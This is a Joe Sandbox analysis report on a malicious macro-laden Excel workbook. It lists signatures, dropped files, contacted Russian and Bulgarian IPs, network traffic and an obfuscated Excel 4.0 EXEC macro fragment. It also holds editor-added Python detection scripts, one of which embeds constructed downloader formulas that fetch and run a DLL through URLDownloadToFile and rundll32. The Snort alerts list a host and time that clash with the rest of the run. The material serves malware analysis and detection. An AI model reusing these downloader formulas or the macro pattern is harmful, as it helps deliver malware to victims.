Analysis Report Comission_1980420924_03172021.xlsm
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Evidence values (file paths, URLs, process command lines, memory strings) are absent from this copy of the report; under each signature only the evidence type and the number of recorded entries survive. |
Source: File opened (1 entry; signature heading not preserved) |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: Section loaded (1 entry) |
Document exploit detected (process start blacklist hit) |
Source: Process created (1 entry) |
Further evidence whose signature headings were not preserved: |
Source: Memory has grown (1 entry) |
Source: TCP traffic (2 entries) |
Source: IP Address (3 entries) |
Source: HTTP traffic detected (2 entries) |
Source: TCP traffic detected without corresponding DNS query (15 entries) |
Source: HTTP traffic detected (2 entries) |
Source: String found in binary or memory (152 entries) |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: Screenshot OCR (2 entries) |
Found Excel 4.0 Macro with suspicious formulas |
Source: Initial sample (1 entry) |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: Initial sample (1 entry) |
Further evidence whose signature headings were not preserved: |
Source: Binary string (1 entry) |
Source: Classification label (1 entry) |
Source: File created (2 entries) |
Source: File read (1 entry) |
Source: Key opened (1 entry) |
Source: Process created (8 entries) |
Source: Automated click (3 entries) |
Source: Window detected (1 entry) |
Source: Initial sample (5 entries) |
Source: Key opened (1 entry) |
Source: File opened (1 entry) |
Source: Process information set (55 entries) |
Source: Binary or memory string (4 entries) |
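The two XLM signatures above (suspicious Excel 4.0 formulas; an abnormally large hidden macro sheet) can be reproduced statically from the OOXML package without ever opening the file in Excel: a macro sheet is a part reachable from xl/workbook.xml through a relationship of type xlMacrosheet, its visibility is the sheet's state attribute, and its code is the text of the f elements. The script below is an added example, not part of the Joe Sandbox report, and does not contain the analysed sample: the workbook it inspects is constructed in memory by build_sample_xlsm(), and the function list, API list and 500-cell size threshold are the editor's assumptions rather than Joe Sandbox's rules.

```python
"""Static triage of an .xlsm for hidden Excel 4.0 (XLM) macro sheets.
Added example, not from the Joe Sandbox report; the workbook it inspects is
constructed below, and the function list, API list and size threshold are
assumptions, not Joe Sandbox's rules. It reads the OOXML package only and
never evaluates a formula."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# XLM functions that give code execution, download, file-write or evasion
# capability; longer names first so FORMULA.FILL is not reported as FORMULA.
SUSPICIOUS_FUNCS = ("FORMULA.FILL", "FORMULA", "EXEC", "CALL", "REGISTER", "RUN",
                    "HALT", "ALERT", "FOPEN", "FWRITE", "CHAR", "GET.WORKSPACE")
# Win32 APIs usually smuggled in as CALL()/REGISTER() arguments.
SUSPICIOUS_APIS = ("URLDownloadToFile", "ShellExecute", "WinExec")
DEFAULT_MAX_CELLS = 500          # assumed "abnormally large" threshold
_FUNC_RE = re.compile(r"\b(" + "|".join(map(re.escape, SUSPICIOUS_FUNCS)) + r")\s*\(", re.I)
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
MACRO_REL = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def _local(name):
    """XML tag or attribute name without its namespace prefix."""
    return name.rsplit("}", 1)[-1]


def build_sample_xlsm(formulas, state="veryHidden"):
    """Constructed test workbook: one ordinary sheet plus one XLM macro sheet
    whose column A holds `formulas`; `state` is the macro sheet's visibility."""
    rows = "".join(f'<row r="{i}"><c r="A{i}"><f>{escape(f)}</f><v>0</v></c></row>'
                   for i, f in enumerate(formulas, start=1))
    parts = {
        "xl/workbook.xml":
            f'<workbook xmlns="{MAIN_NS}" xmlns:r="{REL_NS}"><sheets>'
            '<sheet name="Invoice" sheetId="1" r:id="rId1"/>'
            f'<sheet name="Macro1" sheetId="2" state="{state}" r:id="rId2"/></sheets></workbook>',
        "xl/_rels/workbook.xml.rels":
            f'<Relationships xmlns="{PKG_REL_NS}">'
            f'<Relationship Id="rId1" Type="{REL_NS}/worksheet" Target="worksheets/sheet1.xml"/>'
            f'<Relationship Id="rId2" Type="{MACRO_REL}" Target="macrosheets/sheet1.xml"/>'
            "</Relationships>",
        "xl/worksheets/sheet1.xml": f'<worksheet xmlns="{MAIN_NS}"><sheetData/></worksheet>',
        "xl/macrosheets/sheet1.xml":
            f'<xm:macrosheet xmlns="{MAIN_NS}" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
            f"<sheetData>{rows}</sheetData></xm:macrosheet>",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


def triage_xlsm(data, max_cells=DEFAULT_MAX_CELLS):
    """One finding per XLM macro sheet: visibility, size and what it calls."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        workbook = ET.fromstring(z.read("xl/workbook.xml"))
        rels = {r.get("Id"): (r.get("Target", ""), r.get("Type", ""))
                for r in ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))}
        for sheet in workbook.iter():
            if _local(sheet.tag) != "sheet":
                continue
            rid = next((v for k, v in sheet.attrib.items() if _local(k) == "id"), None)
            target, rtype = rels.get(rid, ("", ""))
            if not rtype.endswith("/xlMacrosheet"):   # ordinary worksheets are not XLM code
                continue
            path = target[1:] if target.startswith("/") else "xl/" + target
            if path not in names:
                continue
            xml = ET.fromstring(z.read(path))
            formulas = [f.text or "" for f in xml.iter() if _local(f.tag) == "f"]
            cells = sum(1 for c in xml.iter() if _local(c.tag) == "c")
            state = sheet.get("state", "visible")
            findings.append({
                "sheet": sheet.get("name"), "state": state,
                "hidden": state in ("hidden", "veryHidden"),
                "cells": cells, "abnormally_large": cells > max_cells,
                "suspicious_functions": sorted({m.group(1).upper()
                                                for f in formulas for m in _FUNC_RE.finditer(f)}),
                "suspicious_apis": [a for a in SUSPICIOUS_APIS
                                    if any(a.lower() in f.lower() for f in formulas)],
            })
    return findings


def is_suspicious(finding):
    """Hidden XLM code that calls into the OS, or an oversized hidden sheet."""
    return bool(finding["hidden"] and (finding["suspicious_functions"]
                                       or finding["suspicious_apis"]
                                       or finding["abnormally_large"]))


# Constructed downloader-style formulas (RFC 5737 test address, made-up paths).
SAMPLE_FORMULAS = [
    'CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://198.51.100.7/x.dll","C:\\Users\\Public\\x.dll",0,0)',
    'EXEC("rundll32.exe C:\\Users\\Public\\x.dll,DllRegisterServer")',
    "HALT()",
]

if __name__ == "__main__":
    for finding in triage_xlsm(build_sample_xlsm(SAMPLE_FORMULAS)):
        print("SUSPICIOUS" if is_suspicious(finding) else "ok", finding)
```

Matching on the relationship type rather than on the macrosheets/ path name matters: the part can live anywhere in the package, and a veryHidden sheet cannot be unhidden from Excel's UI, which is why hidden state plus OS-calling functions is the combination worth alerting on. Real samples often hide the call behind CHAR() concatenation or FORMULA.FILL, so a production version would also score obfuscation; this one only flags the functions themselves.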
Mitre Att&ck Matrix |
---|
Trailing digits on technique names (e.g. Scripting21, Rundll321) are the matrix's per-technique match counters, shown as superscripts in the original rendering; entries without a counter are the unmatched background of the matrix. |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Extra Window Memory Injection1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
95 URLs were submitted to the URL scanners (the URL strings are absent from this copy of the report); none returned a detection. |
Scanner | URLs checked | Detection | Label |
---|---|---|---|
URL Reputation | 86 | 0% | safe |
Avira URL Cloud | 6 | 0% | safe |
Virustotal | 3 | 0% | none (Browse link only) |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
(URL string absent from this copy) | false | | unknown |
(URL string absent from this copy) | false | | unknown |
URLs from Memory and Binaries |
---|
98 URLs were extracted from memory and binaries (URL strings absent from this copy of the report); none is marked malicious. |
Reputation | URLs | Malicious |
---|---|---|
high | 71 | false |
unknown | 27 | false |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
188.119.112.114 | unknown | Russian Federation | 50673 | SERVERIUS-ASNL | false |
188.127.230.104 | unknown | Russian Federation | 56694 | DHUBRU | false |
185.82.219.75 | unknown | Bulgaria | 59729 | ITL-BG | false |
None of the three destinations has an associated domain, which matches the empty Contacted Domains list and the "TCP traffic detected without corresponding DNS query" evidence: the document reaches them by hard-coded IP address. "Malicious: false" here is the IP-reputation verdict only; the Joe Sandbox View / Context section below shows each of these IPs, and each of their ASNs, in other analysed samples classified malicious. |
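In detection terms, "TCP traffic detected without corresponding DNS query" is a join between the DNS log and the connection log: any public TCP destination that no DNS answer named before the connection started was reached by hard-coded address, which is exactly what a downloader macro with embedded IPs produces. The Python below is an added example, not part of the Joe Sandbox report, over constructed Zeek-style JSON log lines: the three 188.x/185.x destinations are the IPs listed above, while the client address, resolver, timestamps, ports, the example.* lookups and the 198.51.100.x / 203.0.113.x addresses are invented test data. The internal-network list and the clock-skew grace window are assumptions.

```python
"""Detect TCP connections to public addresses that no DNS answer named first,
the logic behind "TCP traffic detected without corresponding DNS query".
Added example, not from the Joe Sandbox report. The logs are constructed
Zeek-style JSON lines: only the three 188.x/185.x destinations come from the
report; everything else (client, resolver, timestamps, ports, names,
198.51.100.x and 203.0.113.x) is invented. Internal ranges and the grace
window are assumptions."""
import ipaddress
import json

CONSTRUCTED_DNS_LOG = """\
{"ts":1617809659.1,"id.orig_h":"10.0.0.5","query":"www.example.com","qtype_name":"A","answers":["198.51.100.20"]}
{"ts":1617809660.4,"id.orig_h":"10.0.0.5","query":"cdn.example.net","qtype_name":"A","answers":["edge.example.net","203.0.113.9"]}
{"ts":1617809665.0,"id.orig_h":"10.0.0.5","query":"late.example.org","qtype_name":"A","answers":["203.0.113.40"]}
"""
CONSTRUCTED_CONN_LOG = """\
{"ts":1617809659.3,"id.orig_h":"10.0.0.5","id.resp_h":"198.51.100.20","id.resp_p":443,"proto":"tcp"}
{"ts":1617809661.0,"id.orig_h":"10.0.0.5","id.resp_h":"203.0.113.9","id.resp_p":443,"proto":"tcp"}
{"ts":1617809662.2,"id.orig_h":"10.0.0.5","id.resp_h":"188.119.112.114","id.resp_p":80,"proto":"tcp"}
{"ts":1617809662.9,"id.orig_h":"10.0.0.5","id.resp_h":"188.127.230.104","id.resp_p":80,"proto":"tcp"}
{"ts":1617809663.5,"id.orig_h":"10.0.0.5","id.resp_h":"185.82.219.75","id.resp_p":80,"proto":"tcp"}
{"ts":1617809664.0,"id.orig_h":"10.0.0.5","id.resp_h":"10.0.0.1","id.resp_p":445,"proto":"tcp"}
{"ts":1617809664.2,"id.orig_h":"10.0.0.5","id.resp_h":"203.0.113.40","id.resp_p":443,"proto":"tcp"}
{"ts":1617809664.5,"id.orig_h":"10.0.0.5","id.resp_h":"10.0.0.53","id.resp_p":53,"proto":"udp"}
"""

# Destinations reached without DNS as a matter of course (assumed analyst scope).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "224.0.0.0/4", "::1/128", "fc00::/7", "fe80::/10")]


def _records(log_text):
    """Yield parsed Zeek JSON log lines, skipping blanks and '#' comments."""
    for line in log_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield json.loads(line)


def dns_answer_times(dns_log):
    """Map each IP that appeared in a DNS answer to the earliest ts it did so;
    CNAME targets and other non-address answers are ignored."""
    first_seen = {}
    for rec in _records(dns_log):
        for answer in rec.get("answers") or []:
            try:
                ip = str(ipaddress.ip_address(answer))
            except ValueError:
                continue
            first_seen[ip] = min(first_seen.get(ip, float("inf")), rec["ts"])
    return first_seen


def connections_without_dns(dns_log, conn_log, grace_seconds=0.0):
    """(orig_h, resp_h, resp_p, ts) for each TCP connection to a non-internal
    address that no DNS answer had named before it started. An answer that
    only arrives after the connection does not count: the name was not what
    the client used. grace_seconds absorbs clock skew between the two logs."""
    first_seen = dns_answer_times(dns_log)
    hits = []
    for rec in _records(conn_log):
        if rec.get("proto") != "tcp":
            continue
        dst = ipaddress.ip_address(rec["id.resp_h"])
        if any(dst in net for net in INTERNAL_NETS):
            continue
        seen_at = first_seen.get(str(dst))
        if seen_at is None or seen_at > rec["ts"] + grace_seconds:
            hits.append((rec["id.orig_h"], str(dst), rec["id.resp_p"], rec["ts"]))
    return hits


if __name__ == "__main__":
    for orig, dst, port, ts in connections_without_dns(CONSTRUCTED_DNS_LOG, CONSTRUCTED_CONN_LOG):
        print(f"{ts:.1f} {orig} -> {dst}:{port} (no prior DNS answer)")
```

Two caveats when running this on real traffic: a host that resolved a name before the capture window began will be flagged, so seed the answer map from a longer DNS history (or a passive-DNS store) than the connection window you are scoring; and the internal-range list deliberately does not include the RFC 5737 documentation blocks, which Python's ipaddress treats as non-global, so do not substitute `is_global` without re-checking the test data.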
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383366 |
Start date: | 07.04.2021 |
Start time: | 17:34:19 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Comission_1980420924_03172021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSM@7/9@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Each contacted IP has been seen before in other analysed samples, every one of them classified malicious (the associated sample names and SHA-256 hashes are absent from this copy of the report). |
Match | Associated samples | Detection |
---|---|---|
188.119.112.114 | 12 | malicious |
188.127.230.104 | 12 | malicious |
185.82.219.75 | 13 | malicious |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated samples | Detection |
---|---|---|
ITL-BG | 20 | malicious |
SERVERIUS-ASNL | 20 | malicious |
DHUBRU | 20 | malicious |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
All nine files below were written by EXCEL.EXE; file names and types are absent from this copy of the report. Three of them (171553, 188596 and 188588 bytes) have SSDEEP hashes that differ only in their first and last character, so they are near-identical to one another, and their size and entropy (about 7.65) match the submitted workbook (189036 bytes, entropy 7.66): these are copies of the document itself, consistent with Excel's own temporary and recovery files, rather than new payloads. Only the last file, 330 bytes with an entropy of 1.61 (plain, highly repetitive content rather than packed code), is flagged malicious. |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 133170 |
Entropy (8bit): | 5.371003713327457 |
Encrypted: | false |
SSDEEP: | 1536:IcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:0VQ9DQW+zTXiJ |
MD5: | 220A5B4689B37ACD926FB9DE32A0CBF9 |
SHA1: | EBB2C0513F5652B895DFBCB83FEFB234C73C3255 |
SHA-256: | 27A1CF077F868DA7406B2A3E83F9BA19BA2270330FE170CE292DA8A44B4A6459 |
SHA-512: | 11B9D0579F7D4336D91B6251E0DCD94590E6D8FCC8397DF035CC2B315AF04FF803390CA8F1200FB45F6BC37F7D465488851B80E3C1D041810F8D881215C2597E |
Malicious: | false |
Reputation: | low |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 171553 |
Entropy (8bit): | 7.651426384659082 |
Encrypted: | false |
SSDEEP: | 3072:RXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBd:RXFYiB3kNBozoR8gOvljFy3ZIOXP |
MD5: | 1BE35F6C74B488050049162605294C82 |
SHA1: | 6788B12BD406903C82C3ED6FD46DD8E833612A74 |
SHA-256: | 788C88EB21A724887B5258A8170157BD11FE6A78E0C2C71326E194B6BDF12AC9 |
SHA-512: | EC53901E929051B186070127AD6B05F1A8E6D25C8216187285AB07B78534DF12649204C81B0A9059ADBDF95AAA92CC3978B68DE60A0DB170EB5C66F74FC82895 |
Malicious: | false |
Reputation: | moderate, very likely benign file |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 188596 |
Entropy (8bit): | 7.659198039745405 |
Encrypted: | false |
SSDEEP: | 3072:EXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBG:EXFYiB3kNBozoR8gOvljFy3ZIOXE |
MD5: | 3CB31AC4D2B6884355F3413CD9706C0C |
SHA1: | 557394778B0F59644F3AC31CED127E9D084427FD |
SHA-256: | 4F8E46F30FC972D1EFFD66373D67B2198A97F27EA5122FC301A235003B71C93E |
SHA-512: | B08E996A70AF28CAF6C81CC97BC15AB1496E18D15C9FF29E6C94A7FACD952A564D80BC649DD4805F409E1D2347AF385BBDE1A37CDBB12A891975A2E86549C5ED |
Malicious: | false |
Reputation: | low |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | modified |
Size (bytes): | 2320 |
Entropy (8bit): | 4.709925838350267 |
Encrypted: | false |
SSDEEP: | 48:8jVnYikOsoNKDOsDB6pjVnYikOsoNKDOsDB6:8jEhnDKjEhnD |
MD5: | 82A41CF83DD178B8132F71A0858CB7DD |
SHA1: | 014DE2D51899CED3FF3CA73D641EF5652AF77F55 |
SHA-256: | 81347CA0711EF2AE7DF74EED6E2B02588CA2D57014946A9A4BB88E75AF11ACDF |
SHA-512: | 2B78F0C81B80C417F3FD9DC770DF8AAFB39621F063453264C957AB76BAFFF5433586F28E28FC75508ECC7F41CD4FC71914D861FF5ECB65142AC24D5C1E690789 |
Malicious: | false |
Reputation: | low |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 909 |
Entropy (8bit): | 4.688289890798307 |
Encrypted: | false |
SSDEEP: | 12:80JRU9H6CHiESWAGXWLDRwId+W+jA0/y1bDyOLkeGLkeM4t2Y+xIBjKZm:8qenGP29A0KJDyI7aB6m |
MD5: | 46C630B53384F4A3A12B33D4575768B0 |
SHA1: | C5D85CA7229F404E938244B5B4D325E24B4CE7EE |
SHA-256: | 7537EC84DBED2677F91AFEB475FAA4B94458926922806B83514D7032D370C6A9 |
SHA-512: | 96FFC7BA83ABF7AC7EBD3F95F5016459DD71CD1A0E1F992E61F0A5D7B41CB900F14C63F9C6B4DDA5EF9C814442C2FC16420D71C2FE7BF13480CBDEF36766933D |
Malicious: | false |
Reputation: | low |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 142 |
Entropy (8bit): | 4.567615869533502 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWtnM0TzkVbl+nM0TzkVblmxWtnM0TzkVblv:dje9TzkVbcTzkVbz9TzkVb1 |
MD5: | 5689775EF36F265CCF27A9BAF089052B |
SHA1: | 81F675CAA034CB470D0815A91D6AD59E25EF83E8 |
SHA-256: | FE8FD49E33FDBC456FA7C1D19603A9652BFF3839E92EB7C096428A87628A1562 |
SHA-512: | AB28A99DB258F5D90A6D07F62BF7B0CD6EEDE323084ECA7830DCB2D9B929F6418490E302DD8A0240026766FDFB119FC07BD816872F0912BB7C6BE4E1B42FC67A |
Malicious: | false |
Reputation: | low |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Reputation: | high, very likely benign file |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 188588 |
Entropy (8bit): | 7.659329665847556 |
Encrypted: | false |
SSDEEP: | 3072:oXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBk:oXFYiB3kNBozoR8gOvljFy3ZIOXS |
MD5: | 0594BBF137BDC4A912F57B1F2249C2D1 |
SHA1: | 8B8AD9893175DEE2809145FEFB5D615BAA598EEB |
SHA-256: | 4929A9CF58039F4FFDB8A4BD9EB37286B57BC69419F7CF72A92801DB762574D4 |
SHA-512: | ACA23319614EADF4FD9E058566B0FEA3759773650699DCDA62E87BAE5323F8A9AC3E14E6F0EEE5ED0479D8B5C3CC6A03247234D89FBD8F5E614FA5B7FE246016 |
Malicious: | false |

Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.660562640081434 |
TrID: |
|
File name: | Comission_1980420924_03172021.xlsm |
File size: | 189036 |
MD5: | 7c87c28b3c650992cca31f7728aa2cfd |
SHA1: | e278ae31532f3f65297d8c97d21080321cd79e9f |
SHA256: | c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9 |
SHA512: | 4844ddff58adea9aeaed98893af851f849e9318c06cf440a0651b043ecfa00499dc3e08812efcf5fad955206d12f0f4e57ad953ecad728fbe0cf57bb1b4d88d7 |
SSDEEP: | 3072:kXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBt:kXFYiB3kNBozoR8gOvljFy3ZIOXr |
File Content Preview: | PK..........!..#|.....X.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Comission_1980420924_03172021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""1""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)""=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""2""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=GOTO(sheet1!AU279)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/07/21-17:28:31.289345 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 188.119.112.114 | 192.168.2.22 |
04/07/21-17:28:31.544942 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 185.82.219.75 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 17:35:15.592169046 CEST | 49705 | 80 | 192.168.2.5 | 188.127.230.104 |
Apr 7, 2021 17:35:18.648963928 CEST | 49705 | 80 | 192.168.2.5 | 188.127.230.104 |
Apr 7, 2021 17:35:24.649446964 CEST | 49705 | 80 | 192.168.2.5 | 188.127.230.104 |
Apr 7, 2021 17:35:36.674173117 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.702965021 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:35:36.703063011 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.704644918 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.731509924 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:35:36.932835102 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:35:36.932996035 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.940798044 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:35:36.985958099 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:35:36.986102104 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:35:36.986771107 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:35:37.030154943 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:35:37.204653025 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:35:37.204737902 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:36:41.937640905 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:36:41.937735081 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:36:42.209404945 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:36:42.209533930 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:37:01.482237101 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:37:01.482916117 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:37:01.511718988 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
